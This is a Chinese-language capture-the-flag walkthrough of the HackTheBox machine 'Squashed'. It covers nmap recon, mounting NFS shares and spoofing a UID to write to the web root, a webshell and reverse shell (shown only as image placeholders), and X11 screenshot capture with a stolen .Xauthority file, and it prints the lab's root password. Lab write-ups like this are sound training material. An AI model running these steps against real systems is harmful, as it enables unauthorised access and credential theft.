2023年6月21日 22:43:44
Nmap
┌──(root💀kali)-[/home/kali/hacktheboxtools]
└─# nmap -sCV 10.10.11.191 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-21 11:05 EDT
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.82% done; ETC: 11:06 (0:00:00 remaining)
Nmap scan report for 10.10.11.191
Host is up (0.90s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Built Better
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39773/tcp mountd
| 100005 1,2,3 41561/udp mountd
| 100005 1,2,3 46976/udp6 mountd
| 100005 1,2,3 49217/tcp6 mountd
| 100021 1,3,4 39445/tcp6 nlockmgr
| 100021 1,3,4 41743/tcp nlockmgr
| 100021 1,3,4 49344/udp6 nlockmgr
| 100021 1,3,4 52702/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.30 seconds
80
image.png
没有什么利用价值,纯静态界面
2049–NFS
Refer:https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
image.png
大概的意思就是说nfs 没有基本的鉴权的功能,主要就是根据uid/gid 来进行鉴权
msf扫描脚本
image.png
mount 挂载
image.png
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine]
└─# cd Squashed 1 ⨯
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mkdir ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mkdir html
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
html ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mount -t nfs 10.10.11.191:/home/ross ./ross -o nolock 1 ⨯
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
html ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls -al
total 16
drwxr-xr-x 4 root root 4096 Jun 21 11:17 .
drwxr-xr-x 33 root root 4096 Jun 21 11:17 ..
drwxr-xr-x 2 root root 4096 Jun 21 11:17 html
drwxr-xr-x 14 cjl cjl 4096 Jun 21 01:23 ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# cd ross
l
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/Squashed/ross]
└─# ls -al
total 68
drwxr-xr-x 14 cjl cjl 4096 Jun 21 01:23 .
drwxr-xr-x 4 root root 4096 Jun 21 11:17 ..
lrwxrwxrwx 1 root root 9 Oct 20 2022 .bash_history -> /dev/null
drwx------ 11 cjl cjl 4096 Oct 21 2022 .cache
drwx------ 12 cjl cjl 4096 Oct 21 2022 .config
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Desktop
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Documents
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Downloads
drwx------ 3 cjl cjl 4096 Oct 21 2022 .gnupg
drwx------ 3 cjl cjl 4096 Oct 21 2022 .local
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Music
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Pictures
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Public
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Templates
drwxr-xr-x 2 cjl cjl 4096 Oct 21 2022 Videos
lrwxrwxrwx 1 root root 9 Oct 21 2022 .viminfo -> /dev/null
-rw------- 1 cjl cjl 57 Jun 21 01:23 .Xauthority
-rw------- 1 cjl cjl 2475 Jun 21 01:23 .xsession-errors
-rw------- 1 cjl cjl 2475 Dec 27 10:33 .xsession-errors.old
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/Squashed/ross]
└─# cd ..
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# ls
html ross
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# mount -t nfs 10.10.11.191:/var/www/html ./html -o nolock
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─#
挂载之后我们就可以访问 目标机器上的
- /var/www/html
- /home/ross
image.png
进去发现文件权限都为uid=1001所有
image.png
当我把/etc/passwd文件中,uid=1001的用户的名字修改为someb0dy,并且重新挂载 发现文件所属变成someb0dy了
.Xauthority
image.png
我们在/home/ross根目录下发现了这个文件,后续会进行利用
没有更改uid的时候都是显示权限不足
/var/www/html
image.png
这里可以看到挂载后的html是属于uid=2017用户的
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# usermod someb0dy --help
Usage: usermod [options] LOGIN
Options:
-a, --append append the user to the supplemental GROUPS
mentioned by the -G option without removing
the user from other groups
-b, --badname allow bad names
-c, --comment COMMENT new value of the GECOS field
-d, --home HOME_DIR new home directory for the user account
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
-f, --inactive INACTIVE set password inactive after expiration
to INACTIVE
-g, --gid GROUP force use GROUP as new primary group
-G, --groups GROUPS new list of supplementary GROUPS
-h, --help display this help message and exit
-l, --login NEW_LOGIN new value of the login name
-L, --lock lock the user account
-m, --move-home move contents of the home directory to the
new location (use only with -d)
-o, --non-unique allow using duplicate (non-unique) UID
-p, --password PASSWORD use encrypted password for the new password
-P, --prefix PREFIX_DIR prefix directory where are located the /etc/* files
-r, --remove remove the user from only the supplemental GROUPS
mentioned by the -G option without removing
the user from other groups
-R, --root CHROOT_DIR directory to chroot into
-s, --shell SHELL new login shell for the user account
-u, --uid UID new UID for the user account
-U, --unlock unlock the user account
-v, --add-subuids FIRST-LAST add range of subordinate uids
-V, --del-subuids FIRST-LAST remove range of subordinate uids
-w, --add-subgids FIRST-LAST add range of subordinate gids
-W, --del-subgids FIRST-LAST remove range of subordinate gids
-Z, --selinux-user SEUSER new SELinux user mapping for the user account
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# usermod someb0dy -u 2017
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/Squashed]
└─# su someb0dy
kali% idd
zsh: command not found: idd
kali% id
uid=2017(someb0dy) gid=1001(someb0dy) groups=1001(someb0dy)
kali%
进去之后我们对web根目录有着完全的权限,就可以写文件了,查看.htaccess发现支持 php的解析,上一个一句话木马
image.png
可以命令执行之后尝试反弹shell
image.png
image.png
image.png
成功拿到user权限
root
Refer:https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11#screenshots-capturing
image.png
上传.Xauthority文件
我们通过挂载的方式可以拿到.Xauthority 这个文件
image.png
将.Xauthority文件上传到/目标机器home/alex目录下
授权验证尝试
image.png
image.png
我们把授权文件发送到/home/alex根目录下的时候
直接执行 xdpyinfo -display :0 进行授权验证,并且查询相关信息的时候失败了
我们看到HOME这个环境变量是空的
解决方法是 export HOME=/home/alex ,即把HOME这个环境变量添加上
获取屏幕截图
Refer:https://book.hacktricks.xyz/network-services-pentesting/6000-pentesting-x11#screenshots-capturing
image.png
下载文件—-screenshoot.xwd
通过web目录
image.png
我们直接在
我们如何下载到这个文件呢!?
bingo!!! 把这个文件移动到web根目录
image.png
image.png
通过nc 的命令
image.png
这样也可以将文件发送到我们自己的kaili机器上
接着使用**covert screen.xwd screen.png **转换成图片
截图的内容!有root的密码
| username | password |
|---|---|
| root | cah$mei7rai9A |
image.png
总结
这台靶机又让我学习到一个新的攻击的点,2049 端口 NFS 协议,允许我们挂载文件到本地(但是要注意鉴权,UID/GID),接着进一步利用,在提权部分,对.Xauthority文件的利用也是挺有意思的,通过获取屏幕截图看到管理员将密码展示在桌面上
